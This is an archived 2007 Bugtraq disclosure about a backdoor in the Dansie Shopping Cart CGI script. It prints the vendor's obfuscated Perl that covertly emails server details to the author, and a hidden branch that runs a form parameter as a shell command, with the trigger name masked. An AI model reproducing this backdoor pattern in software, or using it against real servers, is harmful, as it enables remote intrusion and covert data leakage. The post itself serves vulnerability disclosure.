lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070603225052.29424.qmail@securityfocus.com>
Date: 3 Jun 2007 22:50:52 -0000
From: h0tturk@...turk.com
To: bugtraq@...urityfocus.com
Subject: Dansie Cart Script Exploit Reported

Synopsis : This program -deliberately- allows arbitrary commands to be
          executed on the victim server.


One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup.  While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@...sie.net'.  This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':

------
sub there2
{
   $_ = "$_[0]";
   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
   tr/_/-/;
   tr/\@/\./;
   return $_;
}
-------

The call that creates this email address and sends the mail is the
function 'there3'.

-------
sub there3
{
   if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
   {
       $a = &there2('8v59')."\@".
&there2('kte3cv').".".
&there2('ev8');
       $b = &there2('8v59_3jhhzi8');
       pop(@there2);
       pop(@there2);
       $c = &there2("@there2");
       open (TECH, "|$mailprog $a");
       print TECH "To: $a\n";
       print TECH "From: $a\n";
       print TECH "Subject: $b\n\n";
       print TECH "$path3\n";
       print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
       print TECH "$c\n";
       print TECH "$e $there\n" if ($e);
       close (TECH);
   }
}
-------

The ciphered strings, when passed through 'there2', result in:

  8v59          == tech
  kte3cv        == dansie
  ev8           == net
  8v59_3jhhzi8  == tech-support
  $a            == tech@...sie.net
  $b            == Subject: tech-support

This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.

While going through the rest of the code we discovered a much more
interesting item.

(We've masked out the actual trigger element with question marks)

----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || (
($FORM{'?????????'} ) && (!$d) ) )
{
   if ( $ENV{'OS'} )
   {
       system("$FORM{'?????????'}");
   }
   else
   {
       open(ELIF,"|$FORM{'?????????'}");
   }
   exit;
}
--------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ